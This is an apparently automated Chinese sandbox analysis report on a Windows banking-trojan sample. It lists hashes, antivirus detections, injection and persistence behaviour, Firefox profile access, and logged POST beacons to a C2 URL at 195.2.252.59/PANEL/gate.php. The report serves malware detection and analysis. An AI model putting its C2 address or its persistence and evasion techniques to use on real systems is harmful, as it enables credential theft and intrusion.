魔盾安全分析报告

分析类型 开始时间 结束时间 持续时间 分析引擎版本
FILE 2017-08-22 22:31:46 2017-08-22 22:34:10 144 秒 1.4-Maldun
虚拟机机器名 标签 虚拟机管理 开机时间 关机时间
win7-sp1-x64-hpdapp03-1 win7-sp1-x64-hpdapp03-1 KVM 2017-08-22 22:31:52 2017-08-22 22:34:09
魔盾分数

10.0

Generickdz

文件详细信息

文件名 1.exe
文件大小 246784 字节
文件类型 PE32 executable (GUI) Intel 80386, for MS Windows
CRC32 2701284A
MD5 4e3b8920c730df878b149a30d35d7163
SHA1 040a4158da904705b38fe7c943c7fc2d674da6e7
SHA256 47cf31a80061edd87d99518298951f3a71ead96ec3153728f68199d6a0bc303f
SHA512 379721672f7b0f869e9fa8fde5ebe9a1992ca1360d3779ab2309e78052aea78f185e4e18aa49c1e8ea7efedde3f5b09fe785ffe5e1b42a1c1c700c92a599999a
Ssdeep 6144:tRnXlF9dSmU2D22k2222f2222H222282222w2222L2222A2222Z2222O2222fbmE:txXPGmU2D22k2222f2222H222282222t
PEiD 无匹配
Yara
  • IsPE32 ()
  • IsWindowsGUI ()
  • IsPacked (Entropy Check)
  • HasRichSignature (Rich Signature Check)
  • without_images (Rule to detect the no presence of any image)
  • without_attachments (Rule to detect the no presence of any attachment)
  • anti_dbg (Checks if being debugged)
  • win_files_operation (Affect private profile)
  • without_urls (Rule to detect the no presence of any url)
VirusTotal VirusTotal链接
VirusTotal扫描时间: 2017-08-22 04:33:14
扫描结果: 46/64

特征

创建RWX内存
投放出一个二进制文件并执行它
binary: C:\Users\test\AppData\Roaming\94D355F270963256450765\94D355F270963256450765.exe
魔盾wping.org IP地址信誉系统
灰名单: 195.2.252.59
HTTP数据流中包含可疑的恶意软件数据
post_no_referer: HTTP traffic contains a POST request with no referer header
post_no_useragent: HTTP traffic contains a POST request with no user-agent header
ip_hostname: HTTP connection was made to an IP address rather than domain name
suspicious_request: http://195.2.252.59/PANEL/gate.php?94D355F270963256450765
发起了一些HTTP请求
url: http://195.2.252.59/PANEL/gate.php?94D355F270963256450765
二进制文件可能包含加密或压缩数据
section: name: .rsrc, entropy: 7.41, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ, raw_size: 0x00024e00, virtual_size: 0x00024d4d
强制将一个创建的进程加载为另一个不相关进程的子进程
执行了一个进程并在其中注入代码(可能是在解包过程中)
尝试禁止火狐(Firefox)浏览器的SPDY服务以增强网络信息窃取的能力
尝试删除从因特网下载文件的证据
file: C:\Users\test\AppData\Roaming\94D355F270963256450765\94D355F270963256450765.exe:Zone.Identifier
从磁盘上删除自身的原始二进制
通过进程尝试长时间延迟分析任务
Process: dllhost.exe tried to sleep 5160 seconds, actually delayed analysis time by 0 seconds
用空字符创建一个注册表键或注册表值以避免被注册表编辑器检测到
keyval: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\\x0094D355F270963256450765\xe3\x9c\xb0
keyval: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\\x0094D355F270963256450765\xe6\x95\xb2
keyval: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\\x0094D355F270963256450765\xd0\x80
keyval: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\\x0094D355F270963256450765\xc3\x84
从本地网络浏览器中窃取个人信息
file: C:\Users\test\AppData\Roaming\Mozilla\Firefox\Profiles\i072kp8z.default-1494515848972\prefs.js
file: C:\Users\test\AppData\Roaming\Mozilla\Firefox\profiles.ini
将自己装载到Windows开机自动启动项目
key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\\x0094D355F270963256450765\xe3\x9c\xb0
data: C:\Users\test\AppData\Roaming\94D355F270963256450765\94D355F270963256450765.exe
key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\\x0094D355F270963256450765\xe6\x95\xb2
data: C:\Users\test\AppData\Roaming\94D355F270963256450765\94D355F270963256450765.exe
key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\\x0094D355F270963256450765\xd0\x80
data: C:\Users\test\AppData\Roaming\94D355F270963256450765\94D355F270963256450765.exe
key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\\x0094D355F270963256450765\xc3\x84
data: C:\Users\test\AppData\Roaming\94D355F270963256450765\94D355F270963256450765.exe
联系C&C服务器HTTP接入(Banking 木马)
url: http://195.2.252.59/PANEL/gate.php?94D355F270963256450765
生成一个自己的复制文件
copy: C:\Users\test\AppData\Roaming\94D355F270963256450765\94D355F270963256450765.exe
尝试禁止浏览器安全报警
key: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\NoProtectedModeBanner
生成可疑网络流量,可能被用来进行恶意活动
signature: ET TROJAN Likely Zbot Generic Post to gate.php Dotted-Quad
signature: ET TROJAN Trojan Generic - POST To gate.php with no accept headers
signature: ET TROJAN Trojan Generic - POST To gate.php with no referer
文件已被至少十个VirusTotal上的反病毒引擎检测为病毒
MicroWorld-eScan: Trojan.GenericKDZ.40157
McAfee: RDN/Generic.hbg
Cylance: Unsafe
VIPRE: Trojan.Win32.Generic!BT
K7AntiVirus: Trojan ( 00514d6a1 )
K7GW: Trojan ( 00514d6a1 )
Invincea: heuristic
Baidu: Win32.Trojan.WisdomEyes.16070401.9500.9996
Cyren: W32/Trojan.JIRZ-1385
Symantec: Trojan.Gen.2
ESET-NOD32: a variant of Win32/Kryptik.FVRV
TrendMicro-HouseCall: Suspicious_GEN.F47V0820
Avast: Win32:Malware-gen
Kaspersky: HEUR:Trojan.Win32.Generic
BitDefender: Trojan.GenericKDZ.40157
Paloalto: generic.ml
ViRobot: Trojan.Win32.Z.Agent.246784.EL
Rising: Malware.Obscure/Heur!1.A89E (cloud:tDR9ZW8vmaK)
Ad-Aware: Trojan.GenericKDZ.40157
Sophos: Mal/Generic-S
Comodo: UnclassifiedMalware
F-Secure: Trojan.GenericKDZ.40157
DrWeb: Trojan.TinyNuke.9
McAfee-GW-Edition: BehavesLike.Win32.Downloader.dc
Emsisoft: Trojan.GenericKDZ.40157 (B)
SentinelOne: static engine - malicious
Webroot: W32.Trojan.Gen
Avira: TR/Crypt.Xpack.sjvei
Fortinet: W32/ETap.A
Antiy-AVL: Trojan/Win32.TSGeneric
Endgame: malicious (high confidence)
Arcabit: Trojan.Generic.D9CDD
AegisLab: Troj.W32.Generic!c
ZoneAlarm: HEUR:Trojan.Win32.Generic
Microsoft: TrojanSpy:Win32/Tinukebot.A!bit
AhnLab-V3: Trojan/Win32.MDA.R207046
ALYac: Trojan.GenericKDZ.40157
AVware: Trojan.Win32.Generic!BT
MAX: malware (ai score=84)
Malwarebytes: Trojan.MalPack
Tencent: Win32.Trojan.Inject.Auto
Ikarus: Trojan.Win32.Crypt
GData: Trojan.GenericKDZ.40157
AVG: Win32:Malware-gen
Panda: Trj/CI.A
CrowdStrike: malicious_confidence_60% (W)

运行截图

网络分析

访问主机记录

直接访问 IP地址 国家名
195.2.252.59 Russian Federation

TCP连接

IP地址 端口
195.2.252.59 80
195.2.252.59 80
195.2.252.59 80
195.2.252.59 80
195.2.252.59 80
195.2.252.59 80
195.2.252.59 80
195.2.252.59 80
195.2.252.59 80
195.2.252.59 80
195.2.252.59 80
195.2.252.59 80
195.2.252.59 80
195.2.252.59 80
195.2.252.59 80
195.2.252.59 80
195.2.252.59 80
195.2.252.59 80
195.2.252.59 80
195.2.252.59 80
195.2.252.59 80
195.2.252.59 80
195.2.252.59 80
195.2.252.59 80
195.2.252.59 80
195.2.252.59 80
195.2.252.59 80
195.2.252.59 80
195.2.252.59 80
195.2.252.59 80
195.2.252.59 80
195.2.252.59 80
195.2.252.59 80
195.2.252.59 80
195.2.252.59 80
195.2.252.59 80

HTTP请求

URL HTTP数据
http://195.2.252.59/PANEL/gate.php?94D355F270963256450765 
POST /PANEL/gate.php?94D355F270963256450765 HTTP/1.1
Host: 195.2.252.59
Pragma: no-cache
Content-type: text/html
Connection: close
http://195.2.252.59/PANEL/gate.php?94D355F270963256450765 
POST /PANEL/gate.php?94D355F270963256450765 HTTP/1.1
Host: 195.2.252.59
Pragma: no-cache
Content-type: text/html
Connection: close
Content-Length: 9
http://195.2.252.59/PANEL/gate.php?94D355F270963256450765 
POST /PANEL/gate.php?94D355F270963256450765 HTTP/1.1
Host: 195.2.252.59
Pragma: no-cache
Content-type: text/html
Connection: close
Content-Length: 36
http://195.2.252.59/PANEL/gate.php?94D355F270963256450765 
POST /PANEL/gate.php?94D355F270963256450765 HTTP/1.1
Host: 195.2.252.59
Pragma: no-cache
Content-type: text/html
Connection: close
Content-Length: 4

静态分析

PE 信息

初始地址 0x00400000
入口地址 0x00407af7
声明校验值 0x00000000
实际校验值 0x0004b71f
最低操作系统版本要求 5.1
编译时间 2017-08-19 09:47:42
载入哈希 498a29e746d9b5cb412502a979c3111d
图标
图标精确哈希值 98e88cb282db09638e9776a65401f90c
图标相似性哈希值 e6139b3f8d1b730f1afd1ee873e2dc4b

版本信息

LegalCopyright: Copyright (C) 2017
FileVersion: 1, 0, 0, 1
ProductVersion: 1, 0, 0, 1
Translation: 0x0000 0x04b0

PE数据组成

名称 虚拟地址 虚拟大小 原始数据大小 特征 熵(Entropy)
.text 0x00001000 0x00013f0c 0x00014000 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 6.38
.data 0x00015000 0x00003e60 0x00001400 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 3.66
.idata 0x00019000 0x000009b6 0x00000a00 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 5.33
.rsrc 0x0001a000 0x00024d4d 0x00024e00 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 7.41
.reloc 0x0003f000 0x00001224 0x00001400 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ 6.25

资源

名称 偏移量 大小 语言 子语言 熵(Entropy) 文件类型
GQDPIW 0x0001a518 0x000071ed LANG_NEUTRAL SUBLANG_NEUTRAL 7.99 data
RT_BITMAP 0x0002f280 0x00003668 LANG_NEUTRAL SUBLANG_NEUTRAL 6.27 data
RT_BITMAP 0x0002f280 0x00003668 LANG_NEUTRAL SUBLANG_NEUTRAL 6.27 data
RT_BITMAP 0x0002f280 0x00003668 LANG_NEUTRAL SUBLANG_NEUTRAL 6.27 data
RT_BITMAP 0x0002f280 0x00003668 LANG_NEUTRAL SUBLANG_NEUTRAL 6.27 data
RT_BITMAP 0x0002f280 0x00003668 LANG_NEUTRAL SUBLANG_NEUTRAL 6.27 data
RT_ICON 0x0003a150 0x00004228 LANG_NEUTRAL SUBLANG_NEUTRAL 6.67 data
RT_ICON 0x0003a150 0x00004228 LANG_NEUTRAL SUBLANG_NEUTRAL 6.67 data
RT_ICON 0x0003a150 0x00004228 LANG_NEUTRAL SUBLANG_NEUTRAL 6.67 data
RT_ICON 0x0003a150 0x00004228 LANG_NEUTRAL SUBLANG_NEUTRAL 6.67 data
RT_ICON 0x0003a150 0x00004228 LANG_NEUTRAL SUBLANG_NEUTRAL 6.67 data
RT_ICON 0x0003a150 0x00004228 LANG_NEUTRAL SUBLANG_NEUTRAL 6.67 data
RT_ICON 0x0003a150 0x00004228 LANG_NEUTRAL SUBLANG_NEUTRAL 6.67 data
RT_ICON 0x0003a150 0x00004228 LANG_NEUTRAL SUBLANG_NEUTRAL 6.67 data
RT_ICON 0x0003a150 0x00004228 LANG_NEUTRAL SUBLANG_NEUTRAL 6.67 data
RT_ICON 0x0003a150 0x00004228 LANG_NEUTRAL SUBLANG_NEUTRAL 6.67 data
RT_MENU 0x0003e780 0x00000218 LANG_NEUTRAL SUBLANG_NEUTRAL 3.29 data
RT_MENU 0x0003e780 0x00000218 LANG_NEUTRAL SUBLANG_NEUTRAL 3.29 data
RT_MENU 0x0003e780 0x00000218 LANG_NEUTRAL SUBLANG_NEUTRAL 3.29 data
RT_GROUP_ICON 0x0003ea10 0x00000022 LANG_NEUTRAL SUBLANG_NEUTRAL 2.45 MS Windows icon resource - 2 icons, 32x32
RT_GROUP_ICON 0x0003ea10 0x00000022 LANG_NEUTRAL SUBLANG_NEUTRAL 2.45 MS Windows icon resource - 2 icons, 32x32
RT_VERSION 0x0003ea34 0x0000019c LANG_NEUTRAL SUBLANG_NEUTRAL 3.16 data
RT_MANIFEST 0x0003ebd0 0x0000017d LANG_NEUTRAL SUBLANG_NEUTRAL 4.91 XML 1.0 document text

导入

库 KERNEL32.dll:
0x41901c - GetModuleHandleA
0x419020 - FindAtomW
0x419024 - CreateFileW
0x419028 - FlushFileBuffers
0x41902c - GetStringTypeW
0x419030 - AddAtomW
0x419034 - SetStdHandle
0x419038 - OutputDebugStringW
0x41903c - LCMapStringW
0x419040 - GetProcAddress
0x419044 - GetLastError
0x419048 - lstrlenW
0x41904c - GetTickCount
0x419050 - WriteConsoleOutputCharacterW
0x419054 - WriteConsoleW
0x419058 - FillConsoleOutputCharacterA
0x41905c - HeapReAlloc
0x419060 - EncodePointer
0x419064 - DecodePointer
0x419068 - GetCommandLineA
0x41906c - RaiseException
0x419070 - RtlUnwind
0x419074 - IsDebuggerPresent
0x419078 - IsProcessorFeaturePresent
0x41907c - ExitProcess
0x419080 - GetModuleHandleExW
0x419084 - MultiByteToWideChar
0x419088 - WideCharToMultiByte
0x41908c - HeapSize
0x419090 - HeapFree
0x419094 - HeapAlloc
0x419098 - SetLastError
0x41909c - GetCurrentThreadId
0x4190a0 - GetProcessHeap
0x4190a4 - GetStdHandle
0x4190a8 - GetFileType
0x4190ac - DeleteCriticalSection
0x4190b0 - GetStartupInfoW
0x4190b4 - GetModuleFileNameA
0x4190b8 - WriteFile
0x4190bc - GetModuleFileNameW
0x4190c0 - QueryPerformanceCounter
0x4190c4 - GetCurrentProcessId
0x4190c8 - GetSystemTimeAsFileTime
0x4190cc - GetEnvironmentStringsW
0x4190d0 - FreeEnvironmentStringsW
0x4190d4 - UnhandledExceptionFilter
0x4190d8 - SetUnhandledExceptionFilter
0x4190dc - InitializeCriticalSectionAndSpinCount
0x4190e0 - Sleep
0x4190e4 - GetCurrentProcess
0x4190e8 - TerminateProcess
0x4190ec - TlsAlloc
0x4190f0 - TlsGetValue
0x4190f4 - TlsSetValue
0x4190f8 - TlsFree
0x4190fc - GetModuleHandleW
0x419100 - EnterCriticalSection
0x419104 - LeaveCriticalSection
0x419108 - GetConsoleCP
0x41910c - GetConsoleMode
0x419110 - SetFilePointerEx
0x419114 - IsValidCodePage
0x419118 - GetACP
0x41911c - GetOEMCP
0x419120 - GetCPInfo
0x419124 - LoadLibraryExW
0x419128 - CloseHandle
库 USER32.dll:
0x419140 - LoadBitmapA
0x419144 - LoadIconA
0x419148 - GetRawInputBuffer
0x41914c - GetCaretPos
0x419150 - RegisterRawInputDevices
0x419154 - LoadImageA
0x419158 - LoadKeyboardLayoutA
0x41915c - LoadCursorA
0x419160 - LoadCursorFromFileA
0x419164 - LoadAcceleratorsA
库 GDI32.dll:
0x419000 - CopyEnhMetaFileA
0x419004 - GetEnhMetaFileHeader
0x419008 - CombineRgn
0x41900c - ColorMatchToTarget
0x419010 - CombineTransform
0x419014 - ColorCorrectPalette
库 SHELL32.dll:
0x419130 - ShellAboutA
0x419134 - DragQueryFileW
0x419138 - FindExecutableA

投放文件

94D355F270963256450765

文件名 94D355F270963256450765
相关文件
  • C:\Users\test\AppData\Local\Temp\94D355F270963256450765
文件大小 38 bytes
文件类型 ASCII text, with no line terminators
MD5 65049f4c4c1aa9b8aeb988d0619ded8a
SHA1 0da4845b935838efc0afcfe75b10e5724eaa60c3
SHA256 10f748895d50d4f3174f5b77ae42a932606592694ccafcc3edf0c8e877ba4c52
SHA512 1da5d7b8579b4909f892a71e53563de621a1ed3a406c2a5afd699bd2f050c32baa325264020e151ce913267608a27530b79e0e12f4e14baa9240084b62411987
Ssdeep 3:oNmWfkiE2J5xAImACn:oNm+kn23fyn
VirusTotal 搜索相关分析

94D355F270963256450765.exe

文件名 94D355F270963256450765.exe
相关文件
  • C:\Users\test\AppData\Roaming\94D355F270963256450765\94D355F270963256450765.exe
文件大小 246784 bytes
文件类型 PE32 executable (GUI) Intel 80386, for MS Windows
MD5 4e3b8920c730df878b149a30d35d7163
SHA1 040a4158da904705b38fe7c943c7fc2d674da6e7
SHA256 47cf31a80061edd87d99518298951f3a71ead96ec3153728f68199d6a0bc303f
SHA512 379721672f7b0f869e9fa8fde5ebe9a1992ca1360d3779ab2309e78052aea78f185e4e18aa49c1e8ea7efedde3f5b09fe785ffe5e1b42a1c1c700c92a599999a
Ssdeep 6144:tRnXlF9dSmU2D22k2222f2222H222282222w2222L2222A2222Z2222O2222fbmE:txXPGmU2D22k2222f2222H222282222t
Yara
  • IsPE32 ()
  • IsWindowsGUI ()
  • IsPacked (Entropy Check)
  • HasRichSignature (Rich Signature Check)
  • without_images (Rule to detect the no presence of any image)
  • without_attachments (Rule to detect the no presence of any attachment)
  • anti_dbg (Checks if being debugged)
  • win_files_operation (Affect private profile)
  • without_urls (Rule to detect the no presence of any url)
VirusTotal 搜索相关分析

94D355F27096325645076532

文件名 94D355F27096325645076532
相关文件
  • C:\Users\test\AppData\Local\Temp\94D355F27096325645076532
文件大小 62464 bytes
文件类型 data
MD5 731bab3d3508aa0869f0342a9aa11467
SHA1 282d224b57ab4a35d687e33068b940179b9462ba
SHA256 fe82efee93de3a80e9854454877c8f4daa2b95c1286b075bc7981a32ae334c12
SHA512 bac605f21d6dee06b4a133ac3c7159356162a074e78624e163ee54ae0ff069dfc9fa0f85ca5290afccb0a16a8a73de67773eb8f35327670658f95b386b5bccdb
Ssdeep 1536:02kWr0SOTOKvxfWtn9Hc01Ry6snFLGy5z695uCQDP:02k/SYOIxfKH1DsnFLGwzc5u3
VirusTotal 搜索相关分析

94D355F27096325645076564

文件名 94D355F27096325645076564
相关文件
  • C:\Users\test\AppData\Local\Temp\94D355F27096325645076564
文件大小 47616 bytes
文件类型 data
MD5 41791bdffdc74441046c87471d4e0091
SHA1 3cb7569e4683882f6f500eaf6d27f485b27f2ac3
SHA256 e9888ee3f8bae9be5872ed965446ae2f52ce1eca2dd3db9deec1a28a6e286983
SHA512 5fa4b06c8f3e9437ab9e78a2894095bd66869842a1fd005c51beb3a12bdfa82fc4eaeff524f90f71f5ffe5d12177ac2bfd2e540b722bf378ace079afdb5a3829
Ssdeep 768:Yx4Wh2GZ+FX+qXpiEGiyJcl1bfNRjcOOVyE2yy5rUmz06LmZ61034AWeAJrGZrop:Yx4WIGZ+Yq3GAXNsyExCrRn1npegrGZq
VirusTotal 搜索相关分析

prefs.js

文件名 prefs.js
相关文件
  • C:\Users\test\AppData\Roaming\Mozilla\Firefox\Profiles\i072kp8z.default-1494515848972\prefs.js
文件大小 19089 bytes
文件类型 ASCII text, with very long lines, with CRLF line terminators
MD5 d4161f93e43e4f9423c9bf8e0e684b0b
SHA1 b8ba7dd66d06b0f3e79fd311282776642394b8b5
SHA256 d2a3dffffcf6fe4196b3c1a75d0b3d62932f971ec81c8b3e20def295d5f978cf
SHA512 b94ed1c1d6fb501bd38b7fb8368760f19bdc4eee9454901cbf5ae56618738992eaa50c3b87ee99062149eebdf663c8220f7299897db9a7aca781e5f00e525dc5
Ssdeep 192:VHzTgv5+adaIMC6EMJu6w1tF1xKRVD5+jzYfY76D1hWZz87l8z9BgHfivGIPD:NXs1tFjKH4jkQicZzOle9BofwGSD
Yara
  • without_images (Rule to detect the no presence of any image)
  • without_attachments (Rule to detect the no presence of any attachment)
  • with_urls (Rule to detect the presence of an or several urls)
VirusTotal 搜索相关分析

行为分析

互斥量(Mutexes)
  • 94D355F270963256450765
执行的命令
  • "C:\Users\test\AppData\Local\Temp\1.exe"
  • "C:\Users\test\AppData\Roaming\94D355F270963256450765\94D355F270963256450765.exe"
创建的服务 无信息
启动的服务 无信息

进程

1.exe PID: 1588, 上一级进程 PID: 1144

1.exe PID: 2064, 上一级进程 PID: 1588

94D355F270963256450765.exe PID: 2316, 上一级进程 PID: 2064

94D355F270963256450765.exe PID: 2376, 上一级进程 PID: 2316

dllhost.exe PID: 2616, 上一级进程 PID: 2376

访问的文件
  • C:\Users\test\AppData\Local\Temp\apfHQ
  • C:\
  • C:\Users\test\AppData\Local\Temp\94D355F270963256450765
  • C:\Users\test\AppData\Roaming\94D355F270963256450765
  • C:\Users\test\AppData\Local\Temp\1.exe
  • C:\Users\test\AppData\Roaming\94D355F270963256450765\94D355F270963256450765.exe
  • C:\Users\test\AppData\Roaming\Mozilla\Firefox\profiles.ini
  • C:\Users\test\AppData\Roaming\Mozilla\Firefox\Profiles\i072kp8z.default-1494515848972\prefs.js
  • C:\Windows\Globalization\Sorting\sortdefault.nls
  • C:\Users\test\AppData\Local\Temp\94D355F27096325645076532
  • C:\Users\test\AppData\Local\Temp\94D355F27096325645076564
  • C:\Users\test\AppData\Roaming\94D355F270963256450765\94D355F270963256450765.exe:Zone.Identifier
读取的文件
  • C:\Users\test\AppData\Local\Temp\1.exe
  • C:\Users\test\AppData\Roaming\Mozilla\Firefox\profiles.ini
  • C:\Users\test\AppData\Roaming\Mozilla\Firefox\Profiles\i072kp8z.default-1494515848972\prefs.js
  • C:\Windows\Globalization\Sorting\sortdefault.nls
  • C:\Users\test\AppData\Local\Temp\94D355F27096325645076532
  • C:\Users\test\AppData\Roaming\94D355F270963256450765\94D355F270963256450765.exe
  • C:\Users\test\AppData\Local\Temp\94D355F27096325645076564
  • C:\Users\test\AppData\Local\Temp\94D355F270963256450765
修改的文件
  • C:\Users\test\AppData\Local\Temp\94D355F270963256450765
  • C:\Users\test\AppData\Roaming\94D355F270963256450765\94D355F270963256450765.exe
  • C:\Users\test\AppData\Roaming\Mozilla\Firefox\Profiles\i072kp8z.default-1494515848972\prefs.js
  • C:\Users\test\AppData\Local\Temp\94D355F27096325645076532
  • C:\Users\test\AppData\Local\Temp\94D355F27096325645076564
删除的文件
  • C:\Users\test\AppData\Roaming\94D355F270963256450765\94D355F270963256450765.exe:Zone.Identifier
  • C:\Users\test\AppData\Local\Temp\1.exe
  • C:\Users\test\AppData\Local\Temp\94D355F270963256450765
注册表键
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\\x0094D355F270963256450765\xe3\x9c\xb0
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\TabProcGrowth
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\NoProtectedModeBanner
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\\x0094D355F270963256450765\xc3\x84
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\\x0094D355F270963256450765\xe6\x95\xb2
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\\x0094D355F270963256450765\xd0\x80
读取的注册表键
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
修改的注册表键
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\\x0094D355F270963256450765\xe3\x9c\xb0
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\TabProcGrowth
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\NoProtectedModeBanner
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\\x0094D355F270963256450765\xc3\x84
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\\x0094D355F270963256450765\xe6\x95\xb2
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\\x0094D355F270963256450765\xd0\x80
删除的注册表键 无信息
API解析
  • kernel32.dll.FlsAlloc
  • kernel32.dll.FlsFree
  • kernel32.dll.FlsGetValue
  • kernel32.dll.FlsSetValue
  • kernel32.dll.InitializeCriticalSectionEx
  • kernel32.dll.CreateEventExW
  • kernel32.dll.CreateSemaphoreExW
  • kernel32.dll.SetThreadStackGuarantee
  • kernel32.dll.CreateThreadpoolTimer
  • kernel32.dll.SetThreadpoolTimer
  • kernel32.dll.WaitForThreadpoolTimerCallbacks
  • kernel32.dll.CloseThreadpoolTimer
  • kernel32.dll.CreateThreadpoolWait
  • kernel32.dll.SetThreadpoolWait
  • kernel32.dll.CloseThreadpoolWait
  • kernel32.dll.FlushProcessWriteBuffers
  • kernel32.dll.FreeLibraryWhenCallbackReturns
  • kernel32.dll.GetCurrentProcessorNumber
  • kernel32.dll.GetLogicalProcessorInformation
  • kernel32.dll.CreateSymbolicLinkW
  • kernel32.dll.EnumSystemLocalesEx
  • kernel32.dll.CompareStringEx
  • kernel32.dll.GetDateFormatEx
  • kernel32.dll.GetLocaleInfoEx
  • kernel32.dll.GetTimeFormatEx
  • kernel32.dll.GetUserDefaultLocaleName
  • kernel32.dll.IsValidLocaleName
  • kernel32.dll.LCMapStringEx
  • kernel32.dll.GetTickCount64
  • kernel32.dll.LocalAlloc
  • kernel32.dll.VirtualProtect
  • user32.dll.MessageBoxA
  • user32.dll.GetMessageExtraInfo
  • kernel32.dll.WinExec
  • kernel32.dll.CreateFileA
  • kernel32.dll.WriteFile
  • kernel32.dll.CloseHandle
  • kernel32.dll.CreateProcessA
  • kernel32.dll.GetThreadContext
  • kernel32.dll.VirtualAlloc
  • kernel32.dll.VirtualAllocEx
  • kernel32.dll.VirtualFree
  • kernel32.dll.ReadProcessMemory
  • kernel32.dll.WriteProcessMemory
  • kernel32.dll.SetThreadContext
  • kernel32.dll.ResumeThread
  • kernel32.dll.WaitForSingleObject
  • kernel32.dll.GetModuleFileNameA
  • kernel32.dll.GetCommandLineA
  • ntdll.dll.NtUnmapViewOfSection
  • ntdll.dll.NtWriteVirtualMemory
  • user32.dll.RegisterClassExA
  • user32.dll.CreateWindowExA
  • user32.dll.PostMessageA
  • user32.dll.GetMessageA
  • user32.dll.DefWindowProcA
  • kernel32.dll.GetFileAttributesA
  • kernel32.dll.GetStartupInfoA
  • kernel32.dll.VirtualProtectEx
  • kernel32.dll.LoadLibraryA
  • kernel32.dll.GetProcAddress
  • kernel32.dll.GetWindowsDirectoryA
  • kernel32.dll.WideCharToMultiByte
  • user32.dll.wsprintfA
  • kernel32.dll.MultiByteToWideChar
  • msvcrt.dll.malloc
  • msvcrt.dll.free
  • kernel32.dll.CreateRemoteThread
  • shlwapi.dll.PathRemoveFileSpecA
  • shlwapi.dll.PathFindFileNameA
  • msvcrt.dll.strncmp
  • msvcrt.dll._strnicmp
  • kernel32.dll.lstrlenA
  • kernel32.dll.ExitProcess
  • shell32.dll.SHGetFolderPathA
  • kernel32.dll.lstrcpyA
  • kernel32.dll.lstrcatA
  • kernel32.dll.CopyFileA
  • kernel32.dll.GetVolumeInformationA
  • secur32.dll.GetUserNameExA
  • advapi32.dll.LookupAccountNameA
  • advapi32.dll.ConvertSidToStringSidA
  • kernel32.dll.LocalFree
  • msvcrt.dll.memcpy
  • kernel32.dll.lstrcmpA
  • kernel32.dll.lstrcmpiA
  • shlwapi.dll.StrStrA
  • shlwapi.dll.StrStrIA
  • msvcrt.dll.strtol
  • msvcrt.dll.realloc
  • ws2_32.dll.WSAStartup
  • ws2_32.dll.socket
  • ws2_32.dll.gethostbyname
  • ws2_32.dll.htons
  • ws2_32.dll.connect
  • ws2_32.dll.send
  • ws2_32.dll.recv
  • ws2_32.dll.closesocket
  • ws2_32.dll.WSACleanup
  • msvcrt.dll.memset
  • kernel32.dll.Sleep
  • ntdll.dll.NtOpenKey
  • ntdll.dll.NtSetValueKey
  • ntdll.dll.RtlCreateUserThread
  • kernel32.dll.InitializeCriticalSection
  • kernel32.dll.EnterCriticalSection
  • kernel32.dll.LeaveCriticalSection
  • kernel32.dll.GetLastError
  • msvcrt.dll._errno
  • msvcrt.dll.tolower
  • msvcrt.dll.isdigit
  • msvcrt.dll.strtoul
  • msvcrt.dll.isxdigit
  • msvcrt.dll.strtod
  • kernel32.dll.CreateToolhelp32Snapshot
  • kernel32.dll.Process32First
  • kernel32.dll.Process32Next
  • shlwapi.dll.StrChrA
  • shlwapi.dll.StrToIntA
  • kernel32.dll.GetModuleHandleA
  • version.dll.GetFileVersionInfoSizeA
  • version.dll.GetFileVersionInfoA
  • version.dll.VerQueryValueA
  • psapi.dll.GetModuleInformation
  • msvcrt.dll.memcmp
  • kernel32.dll.ExpandEnvironmentStringsA
  • kernel32.dll.GetPrivateProfileSectionNamesA
  • kernel32.dll.GetPrivateProfileStringA
  • kernel32.dll.ReadFile
  • advapi32.dll.RegSetValueExA
  • advapi32.dll.RegOpenKeyExA
  • advapi32.dll.RegCloseKey
  • kernel32.dll.GetFileSize
  • kernel32.dll.IsWow64Process
  • kernel32.dll.GetNativeSystemInfo
